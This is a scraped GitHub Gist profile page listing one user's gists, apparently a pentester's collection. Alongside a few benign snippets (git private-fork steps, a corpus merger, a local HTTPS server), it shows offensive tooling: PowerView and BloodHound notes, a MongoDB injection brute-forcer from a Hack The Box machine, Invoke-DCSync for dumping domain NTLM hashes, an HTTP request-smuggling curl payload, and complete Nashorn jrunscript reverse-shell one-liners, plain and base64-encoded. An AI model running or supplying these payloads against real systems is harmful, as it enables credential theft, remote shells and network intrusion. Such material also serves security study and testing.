Skip to content

Instantly share code, notes, and snippets.


m1n1 joeminicucci

View GitHub Profile
joeminicucci /
Created Jan 12, 2021 — forked from 0xjac/
Create a private fork of a public repository

The repository for the assignment is public and Github does not allow the creation of private forks for public repositories.

The correct way of creating a private frok by duplicating the repo is documented here.

For this assignment the commands are:

  1. Create a bare clone of the repository. (This is temporary and will be removed so just do it wherever.)
    git clone --bare
joeminicucci /
Last active Feb 4, 2021
Tatoeba Corpora Merger
import bz2
import csv
import io
import os
import tarfile
import requests
import argparse
from termcolor import colored
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
#ippsec's Mango HTB mongo DB brute force script
import requests
def inject(data):
r ='', data=data, allow_redirects=False)
if r.status_code != 200:
return True
#can add prefixes to secret to pretext where the brute-force begins
secret = ""
payload = ""
joeminicucci /
Created Feb 13, 2020
DogWhisperer - BloodHound Cypher Cheat Sheet (v2)
joeminicucci / Invoke-DCSync.ps1
Created Jan 23, 2020 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
View Invoke-DCSync.ps1
This file has been truncated, but you can view the full file.
function Invoke-DCSync
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y
joeminicucci / DerivativeAdmin.ps1
Created Nov 10, 2019
Derivative Admin search using PowerView with Dijkstra's algorithm
View DerivativeAdmin.ps1
# From
# Requires PowerView
$Graph = @()
$Infinity = [int]::MaxValue
$Nodes = Get-NetUser | ForEach-Object { $_.samaccountname }
$Nodes += Get-NetComputer
ForEach($Node in $Nodes){
$Vertex = New-Object PSObject
#CL:TE -- Standard CL and TE
curl -i -s -k -X $'POST' \
-H $'Host:' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' -H $'Content-Length: 382' -H $'Transfer-Encoding: chunked' \
--data-binary $'172\x0d\x0aPOST /def HTTP/1.1\x0d\x0aHost:\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\x0d\x0aAccept-Language: en-US,en;q=0.5\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aConnection: keep-alive\x0d\x0aUpgrade-Insecure-Requests: 1\x0d\x0aCache-Control: max-age=0\x0d\x0a0\x0d\x0a\x0d\x0a' \

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(;while(pe.available()>0)so.write(;while(si.available()>0)po.write(;so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
# taken from
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl